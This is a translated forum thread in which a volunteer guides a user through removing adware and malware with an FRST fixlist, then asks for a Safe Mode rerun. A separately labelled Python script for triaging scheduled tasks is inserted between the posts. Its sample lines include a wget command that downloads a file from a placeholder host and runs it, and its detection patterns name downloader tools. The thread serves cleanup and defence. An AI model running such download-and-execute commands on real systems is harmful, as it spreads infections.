    CHR HKLM\...\Chrome\Extension: [jdiejbegdjikmehflknhkbieocmnogcf] - C:\Users\Woytek\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdiejbegdjikmehflknhkbieocmnogcf.crx [2015-11-07]
    CHR HKLM-x32\...\Chrome\Extension: [ejdabpabkmacjiiooccecnpakonoibah] - C:\Program Files (x86)\DownTangoLauncherToolbar\chrome\DownTangoLauncherToolbar.crx <nie znaleziono>
    CHR HKLM-x32\...\Chrome\Extension: [jdiejbegdjikmehflknhkbieocmnogcf] - C:\Users\Woytek\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdiejbegdjikmehflknhkbieocmnogcf.crx [2015-11-07]
    R2 WpSvc; c:\users\woytek\appdata\roaming\360bizhi\lpi\WpSvc.dll [253352 2016-11-17] ()
    S2 biroguli; C:\Program Files (x86)\cf94849c-fafb-4991-aaa4-42bd333ecba81483574113\knscf94849c-fafb-4991-aaa4-42bd333ecba8.tmpfs [X]
    S2 ef65f95a; "C:\Windows\system32\rundll32.exe" "c:\progra~3\intele~1\IntelewinfilterSvc.dll",service
    S2 GoogleChromeUpService; C:\ProgramData\service.exe /s GoogleChromeUpService /uid:51495 /local:br [X] <==== UWAGA
    S2 GoogleChromeUpSvc; C:\ProgramData\Windows Update\svrupg.exe /s GoogleChromeUpSvc /uid:51495 /local:br [X] <==== UWAGA
    S2 HpSvc; C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll [X] <==== UWAGA
    S2 MaohaWifiSvr; C:\Program Files (x86)\Maoha\MaohaAP\MaohaWifiSvr.exe [X]
    S2 SaFiSvc; C:\Program Files\SaFiPlayer\SaFiSvc.dll [X]
    S2 UCBrowserSvc; "C:\Program Files (x86)\UCBrowser\Application\UCService.exe" [X]
    S2 Winsere; "C:\Program Files (x86)\Winsere\Winsere\Winsere.exe" {79740E79-A383-47A7-B513-3DF6563D007F} {A16B1AF7-982D-40C3-B5C1-633E1A6A6678} [X]
    S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2016-11-06] ()
    S3 EsgScanner; C:\Windows\SysWOW64\DRIVERS\EsgScanner.sys [19984 2016-11-06] ()
    S3 TSSKX64; C:\Windows\System32\drivers\tsskx64.sys [54904 2016-05-25] (电脑管家)
    R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [23652 ] (UC Web Inc.) <==== UWAGA
    U3 ak8594xo; C:\Windows\System32\Drivers\ak8594xo.sys [0 ] (Microsoft Corporation) <==== UWAGA (zerobajtowy plik/folder)
    S3 athur; system32\DRIVERS\athurx.sys [X]
    S2 ComputerZLock; \??\C:\Program Files (x86)\LuDaShi\ComputerZLock_x64.sys [X] <==== UWAGA
    S3 cpuz139; \??\C:\Users\Woytek\AppData\Local\Temp\cpuz139\cpuz139_x64.sys [X]
    S1 cxvlagnq; \??\C:\Windows\system32\drivers\cxvlagnq.sys [X]
    S1 dfnftzkt; \??\C:\Windows\system32\drivers\dfnftzkt.sys [X]
    S1 dnhdydei; \??\C:\Windows\system32\drivers\dnhdydei.sys [X]
    S3 dtldrvhelp; \??\c:\program files\safiplayer\dtldrvhelp64.sys [X]
    S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
    S1 egpfuutg; \??\C:\Windows\system32\drivers\egpfuutg.sys [X]
    S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
    S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
    S3 gdrv; \??\C:\Windows\gdrv.sys [X]
    S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X]
    S1 MaohaWifiNetPro; \??\C:\Program Files (x86)\Maoha\MaohaAP\MaoHaWiFiNet64.sys [X]
    S1 methovvu; \??\C:\Windows\system32\drivers\methovvu.sys [X]
    S3 NvStreamKms; \??\C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [X]
    S1 QMUdisk; \??\C:\Program Files (x86)\Tencent\QQPCMgr\11.5.17490.219\QMUdisk64.sys [X]
    S1 snvvcxku; \??\C:\Windows\system32\drivers\snvvcxku.sys [X]
    S3 softaal; \??\C:\Program Files (x86)\Tencent\QQPCMgr\11.5.17490.219\softaal64.sys [X]
    S1 SRepairDrv; \??\C:\Program Files (x86)\Tencent\QQPCMGR\SRepairDrv [X]
    S2 tsnethlpx64; \??\C:\Program Files (x86)\Tencent\QQPCMgr\11.5.17490.219\TsNetHlpX64.sys [X]
    NETSVCx32: HpSvc -> C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll ==> Brak pliku
    NETSVCx32: WpSvc -> C:\users\woytek\appdata\roaming\360bizhi\lpi\WpSvc.dll ()
    2017-01-07 13:13 - 2017-01-07 13:14 - 00001853 _____ C:\Users\Public\Desktop\360壁纸.lnk
    2017-01-05 02:14 - 2017-01-05 02:14 - 00000000 ____D C:\Users\Woytek\AppData\Local\AdvinstAnalytics
    2017-01-05 00:53 - 2017-01-07 13:20 - 00000000 ____D C:\Users\Woytek\AppData\Roaming\360bizhi
    2017-01-05 00:53 - 2017-01-07 13:15 - 00000000 ____D C:\Users\Woytek\AppData\Roaming\lockhomepage
    2017-01-05 00:53 - 2017-01-07 13:13 - 00000000 ____D C:\Users\Woytek\AppData\Roaming\360wp
    2017-01-05 00:53 - 2017-01-05 00:53 - 00000000 ____D C:\Users\Woytek\AppData\Roaming\LDSGameAssistant
    2017-01-05 00:52 - 2017-01-07 13:14 - 00000000 ____D C:\Users\Woytek\AppData\Roaming\Ludashi
    2017-01-05 00:52 - 2017-01-05 00:52 - 00000000 ____D C:\Users\Woytek\AppData\Roaming\navplugin
    2017-01-05 00:51 - 2017-01-05 00:52 - 00000000 ____D C:\ProgramData\{8E9CA550-EF1A-4fff-93DD-D053E6E19DFE}.tmp
    2017-01-05 00:48 - 2017-01-07 13:10 - 00000294 _____ C:\Windows\Tasks\UCBrowserUpdaterCore.job
    2017-01-05 00:48 - 2017-01-05 00:48 - 00003434 _____ C:\Windows\System32\Tasks\UCBrowserUpdater
    2017-01-05 00:48 - 2017-01-05 00:48 - 00002924 _____ C:\Windows\System32\Tasks\osTip
    2017-01-05 00:48 - 2017-01-05 00:48 - 00002560 _____ C:\Windows\System32\Tasks\UCBrowserUpdaterCore
    2017-01-05 00:47 - 2017-01-07 13:34 - 00000458 _____ C:\Windows\Tasks\UCBrowserUpdater.job
    2017-01-05 00:46 - 2017-01-05 00:48 - 00000000 __SHD C:\ProgramData\WindowsMsg
    2017-01-05 00:46 - 2017-01-05 00:46 - 00000000 ____D C:\ProgramData\Microleaves
    2017-01-05 00:45 - 2017-01-05 00:45 - 00003476 _____ C:\Windows\System32\Tasks\UCBrowserSecureUpdater
    2017-01-05 00:45 - 2017-01-05 00:45 - 00000000 ____D C:\Users\Woytek\AppData\Local\UCBrowser
    2017-01-05 00:44 - 2017-01-05 01:12 - 00000000 ____D C:\Program Files (x86)\UCBrowser
    2017-01-05 00:43 - 2017-01-05 00:43 - 00000000 __SHD C:\Users\Woytek\AppData\Local\svchost
    2017-01-05 00:43 - 2017-01-05 00:43 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
    2017-01-05 00:43 - 2017-01-05 00:43 - 00000000 ____D C:\Users\Default User\AppData\Local\AdvinstAnalytics
    2017-01-05 00:42 - 2017-01-05 00:45 - 00000000 ____D C:\Users\Woytek\AppData\Roaming\Microleaves
    2017-01-07 13:10 - 2014-01-20 12:43 - 00001366 _____ C:\Windows\Tasks\FTdownloader V7.0-updater.job
    2017-01-07 13:10 - 2014-01-20 12:43 - 00001308 _____ C:\Windows\Tasks\FTdownloader V7.0-codedownloader.job
    2017-01-07 13:10 - 2014-01-20 12:43 - 00001190 _____ C:\Windows\Tasks\FTdownloader V7.0-enabler.job
    2017-01-07 13:10 - 2014-01-20 12:42 - 00002192 _____ C:\Windows\Tasks\FTdownloader V7.0-firefoxinstaller.job
    2017-01-07 13:10 - 2014-01-20 12:42 - 00002152 _____ C:\Windows\Tasks\FTdownloader V7.0-chromeinstaller-dev.job
    2017-01-07 13:10 - 2013-06-08 10:37 - 00000350 _____ C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_HP_rmv.job
    2017-01-07 13:10 - 2013-05-31 16:44 - 00000350 _____ C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job
    2017-01-07 13:10 - 2012-09-22 17:24 - 00000414 ____H C:\Windows\Tasks\OptimizerPro1UpdaterTask{08EBDEA9-C622-4E1A-88D6-CC82F934351B}.job
    2017-01-05 02:31 - 2015-08-07 23:56 - 00000000 ____D C:\AdwCleaner
    2017-01-02 21:54 - 2016-10-02 14:41 - 00000388 _____ C:\Windows\Tasks\Driver Easy Scheduled Scan.job
    2016-04-26 13:24 - 2016-04-26 13:24 - 0000009 ____N () C:\ProgramData\a.bat
    2010-08-28 21:43 - 2010-08-28 21:43 - 0577335 ____N () C:\ProgramData\adb.exe
    2010-08-28 21:43 - 2010-08-28 21:43 - 0096256 ____N (Google, inc) C:\ProgramData\AdbWinApi.dll
    2010-08-28 21:43 - 2010-08-28 21:43 - 0060928 ____N (Google, inc) C:\ProgramData\AdbWinUsbApi.dll
    2015-02-12 12:40 - 2016-01-25 13:18 - 0000000 _____ () C:\ProgramData\dat.bmp
    2012-11-06 23:12 - 2012-11-06 23:12 - 83023306 ____T () C:\ProgramData\dsgsdgdsgdsgw.pad
    2010-08-28 21:43 - 2010-08-28 21:43 - 0356009 ____N () C:\ProgramData\fastboot.exe
    2012-11-06 23:12 - 2012-11-06 23:12 - 0044544 _____ (Microsoft Corporation) C:\ProgramData\lsass.exe
    2016-05-02 14:23 - 2016-05-02 14:23 - 0002303 _____ () C:\ProgramData\webad.xml
    2015-02-11 19:23 - 2015-02-11 19:23 - 0332800 _____ () C:\ProgramData\wget.exe
    2016-05-02 14:24 - 2016-05-02 14:24 - 0413439 _____ () C:\ProgramData\xdo.zip
    EmptyTemp:

    In FRST, choose Fix.

    Save the Fixlist.txt file with UTF encoding.

    Run a full scan with Mbam and remove whatever it detects:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/
    and http://ftp.drweb.com/pub/drweb/cureit/launch.exe

    When done, post new FRST logs from a scan.

    0
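A defender's triage of `Task:` lines in the format used by the fixlist above, as an added example that is not part of the original post and not FRST's own logic. The heuristics, the reason names and the sample lines are constructed for illustration, modelled on entries in this thread.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

FRST_FLAG = "<===="      # FRST's own marker, printed as "<==== UWAGA" in Polish logs
MISSING = "Brak pliku"   # missing-target text as it appears in this thread's log

# Illustrative heuristics (assumptions for this example, not FRST's logic).
USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata)\b", re.I)
SCRIPT_EXT = re.compile(r"\.(vbe|vbs|jse|js|bat|cmd)\b", re.I)
DOWNLOADER = re.compile(r"\b(wget|curl|bitsadmin)\b", re.I)
URL = re.compile(r"\b(?:hxxps?|https?):/", re.I)
RUNDLL = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^\s,"]+)', re.I)
SYSTEM_NAMES = {"svchost", "lsass", "csrss", "system", "winlogon"}
GUID_PREFIX = re.compile(r"^\{[0-9A-Fa-f-]{36}\} - ")


class Task(NamedTuple):
    name: str           # task path, or the legacy .job file path
    action: str         # command line the task runs ("" if none is listed)
    frst_flagged: bool  # True when FRST itself marked the line


def parse_task(line: str) -> Optional[Task]:
    """Parse one 'Task:' line; return None for any other kind of line."""
    line = line.strip().replace("&amp;", "&")  # undo HTML escaping from web copies
    if not line.startswith("Task: "):
        return None
    body = line[len("Task: "):]
    flagged = FRST_FLAG in body
    if flagged:
        body = body.split(FRST_FLAG, 1)[0].rstrip()
    body = GUID_PREFIX.sub("", body)           # legacy .job lines carry no GUID
    parts = re.split(r" (?:=>|->) ", body, maxsplit=1)
    action = parts[1].strip() if len(parts) == 2 else ""
    return Task(parts[0], action, flagged)


def reasons(task: Task) -> List[str]:
    """Return the heuristic reasons a task deserves a closer look."""
    found = []
    leaf = re.sub(r"\.job$", "", task.name.rsplit("\\", 1)[-1], flags=re.I)
    if leaf.lower() in SYSTEM_NAMES:
        found.append("masquerading_name")      # task named after a system process
    if USER_WRITABLE.search(task.action):
        found.append("user_writable_path")     # runs from a user-writable folder
    if SCRIPT_EXT.search(task.action):
        found.append("script_action")
    if DOWNLOADER.search(task.action) and URL.search(task.action):
        found.append("download_and_run")       # fetches content on a schedule
    dll = RUNDLL.search(task.action)
    if dll and "\\" not in dll.group(1):
        found.append("rundll32_bare_dll")      # DLL resolved via the search path
    if task.action == MISSING:
        found.append("missing_target")         # orphaned task left behind
    return found


def triage(lines: List[str]) -> List[Tuple[str, bool, List[str]]]:
    """Return (task name, flagged by FRST, reasons) for every suspicious task."""
    report = []
    for line in lines:
        task = parse_task(line)
        if task is None:
            continue
        why = reasons(task)
        if why:
            report.append((task.name, task.frst_flagged, why))
    return report


# Constructed sample lines in the same layout as the fixlist in this thread.
SAMPLE = r"""
Task: {00000000-0000-0000-0000-000000000001} - System32\Tasks\svchost => C:\Users\User\AppData\Local\Temp\sample1234.exe <==== UWAGA
Task: {00000000-0000-0000-0000-000000000002} - System32\Tasks\ExampleTaskV2 => Rundll32.exe Example.dll,main 7 1 <==== UWAGA
Task: {00000000-0000-0000-0000-000000000003} - System32\Tasks\SYSTEM => /R cd "C:\ProgramData" &amp; wget -O dat.bmp hxxp://example.invalid/dat.bmp &amp; start cmd /R dat.bmp <==== UWAGA
Task: {00000000-0000-0000-0000-000000000004} - System32\Tasks\Opera scheduled Autoupdate 1 => C:\Program Files (x86)\Opera\launcher.exe
Task: {00000000-0000-0000-0000-000000000005} - \ProtectedSearch\Protected Search -> Brak pliku <==== UWAGA
Task: C:\Windows\Tasks\Updater.job => C:\Users\User\AppData\Roaming\Example\update.vbe
Task: {00000000-0000-0000-0000-000000000007} - System32\Tasks\WWE
""".strip().splitlines()

if __name__ == "__main__":
    for name, flagged, why in triage(SAMPLE):
        print(f"{name}  frst_flag={flagged}  {', '.join(why)}")
```
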
  • #4 07 Jan 2017 23:13
    Kolobos
    Computer specialist

    You were supposed to run the Fixlist in Safe Mode, not in normal mode. Because of that, the infection was not removed.

    Boot the system into Safe Mode and run this Fixlist.txt there:
    CloseProcesses:
    R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [23652 ] (UC Web Inc.) <==== UWAGA
    U3 a44tkft5; C:\Windows\System32\Drivers\a44tkft5.sys [0 ] (Microsoft Corporation) <==== UWAGA (zerobajtowy plik/folder)
    2017-01-05 00:44 - 2017-01-05 01:12 - 00000000 ____D C:\Program Files (x86)\UCBrowser

    When done, post new logs from a scan.

    0
  • Helpful post
    #6 08 Jan 2017 21:00
    Kolobos
    Computer specialist

    Delete the C:\FRST directory and that's all.

    0
  • #7 09 Jan 2017 12:26
    Cracc
    Level 2  

    Thanks a lot for the help ;)

    0